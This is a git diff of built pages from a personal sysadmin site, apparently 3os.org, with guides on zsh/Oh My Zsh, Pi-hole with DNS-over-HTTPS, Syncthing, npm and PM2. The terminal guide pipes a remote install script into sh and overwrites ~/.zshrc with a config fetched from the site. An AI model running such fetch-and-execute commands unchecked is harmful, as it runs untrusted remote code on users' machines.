After creating the trigger you screen should look like this:
Now we want to ensure that the script runs every 5 minutes. We can do this in Execution
menu:
When 5 minutes passed from the point the trigger was created, the page log should look like this:
We are done with the installation and the configuration. You should already be able to see that some of the emails are marked as read.
Limitations Google's API is limited to 100 threads per request - a single script's run. This means that every 5 minutes it runs it will mark 100 emails as read. Since the script is run every 5 minutes, it won't take long to mark all emails as read automatically. If you aren't able to wait you can do it mark emails as read manually.
Troubleshooting I've seen this script working without any issues for months, But suddenly you may receive an email with the Automatically Mark Archived Email as Read
failing to run all the time. The reason is that the script lost
the Gmail permissions. The solution is to run the script manually and grant the script the necessary permissions as the first time.
Back to top
\ No newline at end of file
diff --git a/automation/guides/better-terminal-experience/index.html b/automation/guides/better-terminal-experience/index.html
new file mode 100644
index 000000000..88b53b626
--- /dev/null
+++ b/automation/guides/better-terminal-experience/index.html
@@ -0,0 +1,181 @@
+
Better Terminal Experience - 3os macos linux terminal zsh oh-my-zsh Better Terminal Experience
Introduction I have been using terminal for a long time, it's one of my essential tools for my everyday work and hobbies. The default terminal experience is not very user friendly, and I find it sometimes frustrating to use for basic tasks. So I decided to improve my terminal experience for macOS and Linux without too much effort from the user side. This guide will help you to install and configure the better terminal experience in less than 5 minutes.
Better Terminal Experience guide based on ZSH Shell with Oh My Zsh on top of it. Using built-in theme called Bira
, zsh auto suggestions plugin that suggests commands as you type based on history and completions and zsh syntax highlighting plugin that highlighting of commands whilst they are typed at a zsh prompt into an interactive terminal.
What's ZSH Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
Installation Requirements Install the following requirements packages with the following commands:
Oh My Zsh We can proceed to install Oh My Zsh with the following command:
sh -c " $( wget https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -) "
+
Answer Yes when asked to change the default shell to zsh.
Install Autosuggestions, Syntax-Highlighting Plugins using git clone:
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting
+git clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions
+
Configuration Oh My Zsh creates a default configuration file called .zshrc
in the user's home directory.
We need to edit the configuration file. You can use any editor to edit the file.
nano example:
We need to add or change the following lines to the configuration file:
Find the theme and change it to bira
find the plugins
and change it to the following:
plugins =( git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)
+
The autosuggestions plugin has a bug with copy and paste so there is a workaround for that. Append the following to the end of the config to activate the workaround.
## Fix for Slow zsh-autosuggestions copy&paste
+autoload -Uz bracketed-paste-magic
+zle -N bracketed-paste bracketed-paste-magic
+zstyle ':bracketed-paste-magic' active-widgets '.self-*'
+
Save and exit the file. Open new terminal window and enjoy Better Terminal Experience!
I've made a personal theme 3os based on the Bira theme with some tweaks.
Danger
The following commands will overwrite your current config if exists.
Make sure you have a backup of your config before proceeding!!!
wget -O ~/.oh-my-zsh/themes/3os.zsh-theme https://3os.org/assets/zsh/3os.zsh-theme
+wget -O ~/.zshrc https://3os.org/assets/zsh/zshrc_config
+
Back to top
\ No newline at end of file
diff --git a/automation/guides/pihole-doh/index.html b/automation/guides/pihole-doh/index.html
new file mode 100644
index 000000000..a623840be
--- /dev/null
+++ b/automation/guides/pihole-doh/index.html
@@ -0,0 +1,237 @@
+
Pi-hole with DOH on Docker - 3os pi-hole doh docker dns dns-over-https Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 Pi-hole as DNS Server with DNS over HTTPS (DOH) Based on Docker Containers
What's Pi-hole? Pi-hole Official Website Official Website .
Pi-hole is a DNS server that is designed to block ads and trackers. It is a free and open source software project. It's based on blocklists and acts as a DNS sinkhole.
What's DNS over HTTPS (DOH)? DNS over HTTPS (DoH) is an internet security protocol that communicates domain name server information in an encrypted way over HTTPS connections.
My Pi-hole Setup My setup fully depends on pi-hole dns server, that's why I use two servers one as primary DNS Server and the second as secondary DNS server.
I've configured my router as a DNS server for all the DHCP clients with primary and the secondary DNS as my pi-hole servers. This way all the clients requests the router to resolve the DNS and the router forwards the request to the pi-hole servers.
Pi-hole-1 runs on ubuntu server (virtual machine) Pi-hole-2 runs on Raspberry Pi Warning
This is not a step by step guide for all the configurations of pihole or how to use docker containers. The following instructions include only the deployment of the pi-hole server with DoH providers.
Installation We Will be using docker-compose
to deploy the pi-hole server with DoH providers with a single configuration file.
The following docker-compose.yml includes two images: Pi-hole container , and cloudflared container . When you run docker-compose up
the containers will be created and started. It will create an internal network for the pihole and two instances of cloudflared. When a request comes in the pihole will forward the request to the cloudflared instances; one of them will use Cloudflare DNS servers and the other will use Google's DNS servers. There is no need to configure the pihole's DNS server at the UI since the configuration is done by docker-compose.yml
file.
When using this setup two folders will be created on the Host machine for persistent storage of the containers: config, dnsmasq.d
. Those folders will be mounted to the containers when its running/restarted/recreated. Those folders will be created at the root folder of the docker-compose.yml file.
Create a folder for the deployment of the containers at your host machine. create a file named docker-compose.yml
at the root folder and copy the following content to it:
version : '2.4'
+
+services :
+ pihole :
+ container_name : pihole
+ hostname : pihole
+ restart : always
+ image : pihole/pihole
+ networks :
+ dns :
+ ipv4_address : 172.20.0.9
+ depends_on :
+ google-8.8.8.8 :
+ condition : service_started
+ cloudflare-1.1.1.1 :
+ condition : service_started
+ volumes :
+ - ./config:/etc/pihole/
+ - ./dnsmasq.d:/etc/dnsmasq.d/
+ - /etc/localtime:/etc/localtime
+ ports :
+ - '7003:80'
+ - '53:53/tcp'
+ - '53:53/udp'
+ environment :
+ - ServerIP=127.0.0.1
+ - WEBPASSWORD=ChangeMe
+ - PIHOLE_DNS_=172.20.0.10;172.20.0.12
+
+ cloudflare-1.1.1.1 :
+ container_name : cloudflare-1.1.1.1
+ hostname : cloudflare-1.1.1.1
+ restart : always
+ image : visibilityspots/cloudflared
+ networks :
+ dns :
+ ipv4_address : 172.20.0.10
+ expose :
+ - '53/tcp'
+ - '53/udp'
+ environment :
+ - PORT=53
+ - UPSTREAM1=https://1.1.1.1/dns-query
+ - UPSTREAM2=https://1.1.1.1/dns-query
+ volumes :
+ - /etc/localtime:/etc/localtime
+
+ google-8.8.8.8 :
+ container_name : google-8.8.8.8
+ hostname : google-8.8.8.8
+ restart : always
+ image : visibilityspots/cloudflared
+ networks :
+ dns :
+ ipv4_address : 172.20.0.12
+ expose :
+ - '53/tcp'
+ - '53/udp'
+ environment :
+ - PORT=53
+ - UPSTREAM1=https://8.8.8.8/dns-query
+ - UPSTREAM2=https://8.8.8.8/dns-query
+ volumes :
+ - /etc/localtime:/etc/localtime
+
+networks :
+ dns :
+ ipam :
+ config :
+ - subnet : 172.20.0.0/24
+
Now run docker-compose up -d
to create the containers. If all went well you should be able to access the pihole server at http://127.0.0.1:7003
with password ChangeMe
from the config above.
Now you need to change your dns server to point to the pihole server. We are done with the installation.
Back to top
\ No newline at end of file
diff --git a/automation/pihole-cloudflare-dns-sync/index.html b/automation/pihole-cloudflare-dns-sync/index.html
new file mode 100644
index 000000000..725eedc2a
--- /dev/null
+++ b/automation/pihole-cloudflare-dns-sync/index.html
@@ -0,0 +1,210 @@
+
Pi-hole Cloudflare DNS Sync - 3os pi-hole docker dns cloudflare Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-05 Pi-hole Cloudflare DNS Sync Pihole Cloudflare DNS Sync Github Repository . Pihole Cloudflare DNS Sync Docker Hub Page .
Description Lightweight Container image based on python:3.9.13-alpine to be used in conjunction with a Pi-hole instance to sync the DNS records from Cloudflare DNS Service to Pi-hole local DNS .
Supports A records CNAME records Any type of Pi-hole instance Requirements Cloudflare API Readonly Token Pi-hole instance Creating a Cloudflare API token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Read Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Parameters Parameter Description Default Type Required CLOUDFLARE_API_TOKEN Cloudflare API Token change_me string Yes CLOUDFLARE_DOMAIN Cloudflare Domain example.com string Yes EXCLUDE_PROXIED_RECORDS Exclude Proxied Records yes string Yes PIHOLE_HOST Pi-hole hostname/IP 123.123.123.123 string Yes PIHOLE_PORT Pi-hole port 80 integer Yes USE_HTTPS http/https for pihole no string Yes PIHOLE_PASSWORD Pi-hole password change_me string Yes RUN_EVERY Run very x minute 5 integer Yes
Usage Docker run example:
docker run -d \
+ --name pihole-cloudflare-dns-sync \
+ -h pihole-cloudflare-dns-sync \
+ --restart always \
+ -v /etc/timezone:/etc/timezone:ro \
+ -v /etc/localtime:/etc/localtime:ro \
+ -e CLOUDFLARE_API_TOKEN = cloudflare_secret_dns_zone_api_token \
+ -e CLOUDFLARE_DOMAIN = example.com \
+ -e EXCLUDE_PROXIED_RECORDS = yes \
+ -e PIHOLE_HOST = 123 .123.123.123 \
+ -e PIHOLE_PORT = 80 \
+ -e USE_HTTPS = no \
+ -e PIHOLE_PASSWORD = secret \
+ -e RUN_EVERY = 1 \
+ -e PUID = 1000 \
+ -e PGID = 1000 \
+fire1ce/pihole-cloudflare-dns-sync
+
Docker compose example:
version: '3'
+
+services:
+ pihole-cloudflare-dns-sync:
+ image: fire1ce/pihole-cloudflare-dns-sync
+ container_name: pihole-cloudflare-dns-sync
+ hostname: pihole-cloudflare-dns-sync
+ restart: always
+ network_mode: bridge
+ volumes:
+ - /etc/timezone:/etc/timezone:ro
+ - /etc/localtime:/etc/localtime:ro
+ environment:
+ - CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token
+ - CLOUDFLARE_DOMAIN=example.com
+ - EXCLUDE_PROXIED_RECORDS=yes
+ - PIHOLE_HOST=123.123.123.123
+ - PIHOLE_PORT=80
+ - USE_HTTPS=no
+ - PIHOLE_PASSWORD=secret
+ - RUN_EVERY=1
+ - PUID=1000
+ - PGID=1000
+
License This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details
Back to top
\ No newline at end of file
diff --git a/automation/syncthings/index.html b/automation/syncthings/index.html
new file mode 100644
index 000000000..9cfdeff27
--- /dev/null
+++ b/automation/syncthings/index.html
@@ -0,0 +1,272 @@
+
Syncthing - 3os syncthing automation linux macos synology windows Authors: fire1ce | Created: 2022-04-21 | Last update: 2022-08-27 Syncthing
Syncthing is a continuous file synchronization program. Syncthing is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices.
Official website: syncthing.net
Debian/Ubuntu Installation We need to add the following Syncthing
repository to the system.
First, we need to add PGP keys to allow the system to check the packages authenticity
sudo curl -s -o /usr/share/keyrings/syncthing-archive-keyring.gpg https://syncthing.net/release-key.gpg
+
Then we will add the stable Syncthing
repository channel to your APT sources
echo "deb [signed-by=/usr/share/keyrings/syncthing-archive-keyring.gpg] https://apt.syncthing.net/ syncthing stable" | sudo tee /etc/apt/sources.list.d/syncthing.list
+
Now we can update the package list and install Syncthing
sudo apt update
+sudo apt install syncthing
+
Configuration Syncthing as a Service Configuring Syncthing as a service will provide us the ability to start and stop and enable/disable the service at boot.
Create a systemd unit file for managing the Syncthing service.
nano /etc/systemd/system/syncthing@.service
+
In the next example we will be setting the Syncthing
service UI to listen on local host (127.0.0.1) and port 8384
Add the following lines to the syncthing@.service
:
[Unit]
+Description = Syncthing - Open Source Continuous File Synchronization for % I
+Documentation = man : syncthing ( 1 )
+After = network . target
+
+[Service]
+User = % i
+ExecStart = / usr / bin / syncthing - no-browser - gui-address = "127.0.0.1:8384" - no-restart - logflags = 0
+Restart = on-failure
+SuccessExitStatus = 3 4
+RestartForceExitStatus = 3 4
+
+[Install]
+WantedBy = multi-user . target
+
Save and close the file when you are finished. Then, reload the systemd daemon to apply the configuration:
systemctl daemon-reload
+
Next, start the Syncthing service with the following command depending on a user this example is root
systemctl start syncthing@root
+
To verify the status of the Syncthing service, run the following command:
systemctl status syncthing@root
+
Finally, enabled the syncthing service on boot
systemctl enable syncthing@root
+
MacOS Installation You can download the MacOS installation package from Syncthing Downloads , But my preferred way is to use the Homebrew package manager.
brew install --cask syncthing
+
Windows Installation Window installation from Syncthing Downloads installs the Syncthing as a service without any system tray icon or menu.
The best way I found is to use SyncTrayzor
from SyncTrayzor Github Page . It hosts and wraps Syncthing, making it behave more like a native Windows application and less like a command-line utility with a web browser interface.
You can also install it with winget
with the following command:
winget install SyncTrayzor . SyncTrayzor
+
Synology DSM Installation In order to install Syncthing, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
After we added Synology Community Packages
you will be able to install Syncthing from the Community
tab.
Permissions for the Syncthing service will be handled by the new system user sc-syncthing
Syncthing Configuration The following configuration is the same for all the installation methods. I'm not going to cover the basic configuration, but I will show you some of my personal preferences.
First to configure the Syncthing we need to access it's Web UI. The Default url is http://127.0.0.1:8384
If you are using Syncthing
at remote Linux host, you can use SSH tunnel to access the Web UI.
ssh -L 8001 :127.0.0.1:8384 root@192.168.102.6
+
This will forward 127.0.0.1:8384
from the remote host to 127.0.0.1:8001
on the local host.
For security reasons, I like to disable all the Discovery and Relay services.
When you disable the Discovery service, you will have to manually add the connection to other devices.
Manual Connection Example tcp://192.168.1.1:22000
+
or
tcp://example.com:22000
+
Syncthing Files Ignore Patterns Syncthing supports of Ignore Patterns
you can use it to Ignore Files
synchronization. This will save you a lot of headaches with sync errors
Here is a list of the Ignore Patterns
for system files:
// Apple macOS
+(?d).DS_Store
+(?d).localized
+(?d)._*
+(?d).Icon*
+(?d).fseventsd
+(?d).Spotlight-V100
+(?d).DocumentRevisions-V100
+(?d).TemporaryItems
+(?d).Trashes
+(?d).Trash-1000
+(?d).iCloud
+(?d)Photos Library.photoslibrary
+
+// GNU/Linux
+(?d).directory
+(?d).Trash-*
+
+// Microsoft Windows
+(?d)desktop.ini
+(?d)ehthumbs.db
+(?d)Thumbs.db
+(?d)$RECYCLE.BIN
+(?d)System Volume Information
+
+// QNAP QTS
+(?d).AppleDB
+(?d).@_thumb
+(?d).@__thumb
+
+// Synology DSM
+(?d)@eaDir
+
+// Adobe Lightroom
+*Previews.lrdata root-pixels.db
+
+// Dropbox
+.dropbox
+.dropbox.attr
+
+// Firefox & Chrome
+*.part
+*.crdownload
+
+// Microsoft Office
+~*
+
+// Parallels Desktop for Mac
+.parallels-vm-directory
+
+// Resilio Sync
+.sync
+*.bts
+*.!Sync
+.SyncID
+.SyncIgnore
+.SyncArchive
+*.SyncPart
+*.SyncTemp
+*.SyncOld
+
+// Temporary and backup files
+*.temporary
+*.tmp
+*._mp
+*.old
+*.syd
+*.dir
+*.gid
+*.chk
+*.dmp
+*.nch
+.*.swp
+*~
+
+// Vim
+*.*.sw[a-p]
+
Example of working Syncthing
Web UI:
Back to top
\ No newline at end of file
diff --git a/blog/index.html b/blog/index.html
new file mode 100644
index 000000000..870a2c45b
--- /dev/null
+++ b/blog/index.html
@@ -0,0 +1,147 @@
+
Blog - News & Updates - 3os Authors: fire1ce | Created: 2021-09-12 | Last update: 2022-12-19 Blog - News & Updates Updated MacOS Section (18/06/22) Updated the MacOS section of the website. Some content has been added and removed due to deprecation at MacOS section.
New Content (24/04/22) Magic Mirror 2.0 External Power Button ] For Raspberry Pi Wake, Power Off, Restart(Double Press) Raspberry Pi - Motion Sensor Display Control
New Content (22/04/22) Proxmox SSL with Let's Encrypt and Cloudflare DNS Challenge
New Content (21/04/22) Syncthings is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices. iGPU Passthrough In Proxmox Server iGPU Split Passthrough In Proxmox Server GPU Passthrough In Proxmox Server Windows SSH Server - configure Windows SSH Server with RSA keys and PowerShell shell.
New Design and Features (15/03/22) I've been working on the new design and new features for a while now. Most of the work was done on the backend for this website including CI/CD, and Cloudflare workers. Some of the new features include: Tags and Comments on pages. This feature will be implemented on most of the pages in the future.
Bettercap 1.6.2 tool for man in the middle attack and ssl strip Metasploit Framework Metasploit Framework, a tool for developing and executing exploit code against a remote target machine Wifite Wifite is an automated wireless attack tool
Proxmark Section (12/09/21) Added Proxmark
section at Penetration Testing. New page About Proxmark device, RFID Tags and where to get them New page Proxmark3 CheatSheet - at very basic level New page Mifare Classic 1K ISO14443A - how to clone Mifare1k tags
ADB CheatSheet (12/09/21) Added ADB CheatSheet page to Penetration Testing - Android. You will find a series of practical example commands for running ADB and getting the most of Android Debug Bridge powerful tool
Back to top
\ No newline at end of file
diff --git a/circuitboard.svg b/circuitboard.svg
new file mode 100644
index 000000000..a85440649
--- /dev/null
+++ b/circuitboard.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/css/extra.css b/css/extra.css
new file mode 100644
index 000000000..c08f2347b
--- /dev/null
+++ b/css/extra.css
@@ -0,0 +1,126 @@
+/* custom color palette */
+[data-md-color-scheme='3os'] {
+ --md-primary-fg-color: #006158;
+ --md-typeset-a-color: #009485;
+}
+[data-md-color-scheme='slate'] {
+ --md-primary-fg-color: #006158;
+ --md-typeset-a-color: #00c5b1;
+}
+
+[data-md-color-scheme='slate'] {
+ --md-hue: 215;
+}
+/* border-radius of the code section*/
+.md-typeset code {
+ border-radius: 5px;
+}
+
+/* images css */
+.md-typeset img {
+ border-radius: 5px;
+ height: auto;
+ max-width: 95%;
+ margin: auto;
+ display: block;
+ box-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;
+}
+
+/* The width of the content area */
+.md-grid {
+ max-width: 1560px;
+}
+
+/* ads padding side bar*/
+
+.ads-sidebar {
+ margin: auto;
+ padding: 0.5rem;
+}
+
+
+/* support buttons */
+
+.donation {
+ padding: 0 0.6rem;
+}
+
+.donate-button-paypal {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/paypal.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-patreon {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/patreon.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-buymeacoffee {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/buymeacoffee.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-github-sponsers {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/github-sponsers.svg');
+ background-color: #ffffff;
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+/* Githubs Tables */
+th,
+td {
+ border: 1px solid var(--md-typeset-table-color);
+ border-spacing: 0;
+ border-bottom: none;
+ border-left: none;
+ border-top: none;
+}
+
+.md-typeset__table table:not([class]) {
+ border-right: none;
+}
+
+.md-typeset__table table:not([class]) td,
+.md-typeset__table table:not([class]) th {
+ padding: 9px;
+}
+
+/* light mode alternating table bg colors */
+.md-typeset__table tr:nth-child(2n) {
+ background-color: #f8f8f8;
+}
+
+/* dark mode alternating table bg colors */
+[data-md-color-scheme='slate'] .md-typeset__table tr:nth-child(2n) {
+ background-color: hsla(var(--md-hue), 25%, 25%, 1);
+}
+
+/* Githubs Tables end */
diff --git a/css/fonts.css b/css/fonts.css
new file mode 100644
index 000000000..665b3b8e7
--- /dev/null
+++ b/css/fonts.css
@@ -0,0 +1,150 @@
+/* rubik-300 - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 300;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-300.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-300.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-300.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-300.woff')
+ format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-300.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-300.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-regular - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-regular.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-regular.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-regular.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/Rubik/rubik-v14-latin-regular.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-regular.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-regular.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-700 - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 700;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-700.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-700.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-700.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-700.woff')
+ format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-700.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-700.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-italic - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: italic;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-italic.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-italic.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-italic.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/Rubik/rubik-v14-latin-italic.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-italic.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-italic.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+
+/* fira-code-300 - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 300;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-300.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-300.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-300.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-300.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/FiraCode/fira-code-v12-latin-300.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-300.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+/* fira-code-regular - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-regular.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-regular.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.woff') format('woff'),
+ /* Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+/* fira-code-700 - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 700;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-700.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-700.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-700.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-700.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/FiraCode/fira-code-v12-latin-700.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-700.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+
+body,
+input {
+ font-family: 'Rubik', -apple-system, Helvetica, Arial, sans-serif;
+}
+
+pre,
+code,
+kbd {
+ font-family: 'Fira Code', -apple-system, Helvetica, Arial, sans-serif;
+}
+/* END MKDOCS TEMPLATE */
diff --git a/css/timeago.css b/css/timeago.css
new file mode 100644
index 000000000..f7ab7d69b
--- /dev/null
+++ b/css/timeago.css
@@ -0,0 +1,15 @@
+/*
+ timeago output is dynamic, which breaks when you print a page.
+
+ This CSS is only included when type: timeago
+ and ensures fallback to type "iso_date" when printing.
+
+ */
+
+.git-revision-date-localized-plugin-iso_date { display: none }
+
+@media print {
+ .git-revision-date-localized-plugin-iso_date { display: inline }
+ .git-revision-date-localized-plugin-timeago { display: none }
+}
+
diff --git a/development/node-npm/npm/index.html b/development/node-npm/npm/index.html
new file mode 100644
index 000000000..423bb81ad
--- /dev/null
+++ b/development/node-npm/npm/index.html
@@ -0,0 +1,176 @@
+
Npm Command-line Utility - 3os npm cheat-sheet node Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-09 Npm Command-line Utility npm is two things: first and foremost, it is an online repository for the publishing of open-source Node.js projects; second, it is a command-line utility for interacting with said repository that aids in package installation, version management, and dependency management. A plethora of Node.js libraries and applications are published on npm, and many more are added every day.
Updating Node & npm to Latest Stable Version npm:
node:
npm cache clean -f
+npm install -g n
+n stable
+
Updating Local Project Packages Navigate to the root directory of your project and ensure it contains a package.json In your project root directory, run:
To test the update, run the outdated
command. There should not be any output .
Updating Globally-Installed Packages To see which global packages need to be updated, on the command line, run:
npm outdated -g --depth= 0
+
To update a single global package, on the command line, run:
npm update -g <package_name>
+
To update all global packages, on the command line, run:
Back to top
\ No newline at end of file
diff --git a/development/node-npm/pm2/index.html b/development/node-npm/pm2/index.html
new file mode 100644
index 000000000..b76d4103d
--- /dev/null
+++ b/development/node-npm/pm2/index.html
@@ -0,0 +1,187 @@
+
PM2 - Node.js Process Manager - 3os npm node pm2 cheat-sheet process-manager Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-04-09 PM2 - Node.js Process Manager PM2 is a daemon process manager that will help you manage and keep your application online. Getting started with PM2 is straightforward, it is offered as a simple and intuitive CLI, installable via NPM.
Follow the official documentation for installation and usage instructions: PM2 Official Documentation
Installation The latest PM2 version is installable with NPM or Yarn:
npm install pm2@latest -g
+# or
+yarn global add pm2
+
Start An Application With PM2 The simplest way to start, daemonize and monitor your application is by using this command line:
Start Application With Detailed Time For Logs pm2 start app.js --log-date-format "YYYY-MM-DD HH:mm:ss"
+
Managing Processes Managing application state is simple here are the commands:
pm2 restart app_name
+pm2 reload app_name
+pm2 stop app_name
+pm2 delete app_name
+
Save Configuration of Processes to PM2 And to freeze a process list for automatic respawn:
List Managed Applications List the status of all application managed by PM2:
Display Logs To display logs in realtime for all processes managed by PM2, use the following command:
To display logs in realtime for all processes managed by PM2, for last 200 lines use the following command:
To display logs in realtime for specific process, use the following command:
pm2 logs <app_name>/<id>
+
To display logs in realtime for specific process, for last 200 lines use the following command:
pm2 logs <app_name>/<id> --lines 200
+
Auto Startup PM2 Restarting PM2 with the processes you manage on server boot/reboot is critical. To solve this, just run this command to generate an active startup script:
Auto Startup PM2 on Raspberry Pi When using PM2 on Raspberry Pi , you will encounter a problem when you try to start pm2 with the default command.
sudo env PATH = $PATH :/usr/local/bin pm2 startup systemd -u pi --hp /home/pi
+
Updating PM2 It's very useful to update PM2 to the latest version, especially when you update your Node.js version. Since updating node will usually break the pm2 process, you can use the following command to update PM2:
npm install pm2@latest -g
+
Then update the in-memory PM2:
You can also create an alias
to update PM2 with one command:
alias pm2update = 'npm install pm2@latest -g && pm2 update && pm2 save'
+
Back to top
\ No newline at end of file
diff --git a/development/python/pip/index.html b/development/python/pip/index.html
new file mode 100644
index 000000000..86e0c68fb
--- /dev/null
+++ b/development/python/pip/index.html
